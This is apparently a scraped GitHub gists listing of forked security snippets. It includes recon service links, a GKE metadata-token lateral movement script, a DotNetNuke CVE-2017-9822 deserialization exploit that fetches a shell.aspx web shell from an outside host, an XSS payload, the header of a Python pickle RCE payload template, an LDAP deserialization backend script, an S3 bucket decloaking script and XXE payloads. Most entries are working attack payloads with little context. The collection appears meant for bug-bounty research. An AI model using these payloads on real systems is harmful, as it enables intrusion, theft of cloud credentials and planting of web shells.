- https://scans.io/
- https://commoncrawl.org/
- https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
- https://www.shodan.io/
- https://opendata.rapid7.com/
- https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
- https://securitytrails.com/
- https://threatcrowd.org/
- https://dnsdumpster.com/
- https://crt.sh/
pnig0s pnigos
pnigos
/ linkfinder-oneliner.sh
Created
September 2, 2020 09:44
— forked from ntrzz/linkfinder-oneliner.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt |
pnigos
/ gke-pod-hacks.sh
Created
May 12, 2020 23:55
— forked from abhisek/gke-pod-hacks.sh
Lateral movement in GKE Pod using Cloud metadata endpoint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get temporary access token using Google Cloud instance metadata | |
| export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \ | |
| http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \ | |
| jq -r '.access_token') | |
| # List all repo from Google cloud registry using access token | |
| curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog | |
| # Docker login | |
| echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GitHub RCE by Environment variable injection Bug Bounty writeup | |
| Disclaimer: I'll keep this really short but I hope you'll get the key points. | |
| GitHub blogged a while ago about some internal tool called gerve: | |
| https://github.com/blog/530-how-we-made-github-fast | |
| Upon git+sshing to github.com gerve basically looks up your permission | |
| on the repo you want to interact with. Then it bounces you further in | |
| another forced SSH session to the back end where the repo actually is. |
pnigos
/ testest
Created
January 19, 2019 05:22
— forked from bearerai/testest
http://g.com/#'"/onmouseover="prompt(1)"/x=
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://g.com/#'"/onmouseover="prompt(1)"/x= |
pnigos
/ DotNetNuke CVE-2017-9822 PoC
Created
October 30, 2018 03:30
— forked from GlitchWitch/DotNetNuke CVE-2017-9822 PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us |
pnigos
/ pickle-payload.py
Created
October 17, 2018 11:23
— forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Pickle deserialization RCE payload. | |
| # To be invoked with command to execute at it's first parameter. | |
| # Otherwise, the default one will be used. | |
| # | |
| import cPickle | |
| import sys | |
| import base64 |
pnigos
/ json-deserialization-ldap.sh
Created
August 18, 2018 02:40
— forked from topolik/json-deserialization-ldap.sh
Backend script based on @pwntester JSON deserialization research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Starting Apache DS using docker @ ldap://localhost:10389" | |
| docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds | |
| echo "... waiting 20 seconds to start Apache DS" | |
| sleep 20 | |
| # password: secret, if used with LDAP login | |
| (cat <<"EOF" |
pnigos
/ a-recon-services-list-for-liveoverflow.md
Created
July 16, 2018 10:30
— forked from EdOverflow/a-recon-services-list-for-liveoverflow.md
pnigos
/ bucket-disclose.sh
Created
July 7, 2018 02:38
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
pnigos
/ XXE_payloads
Created
August 7, 2017 12:27
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |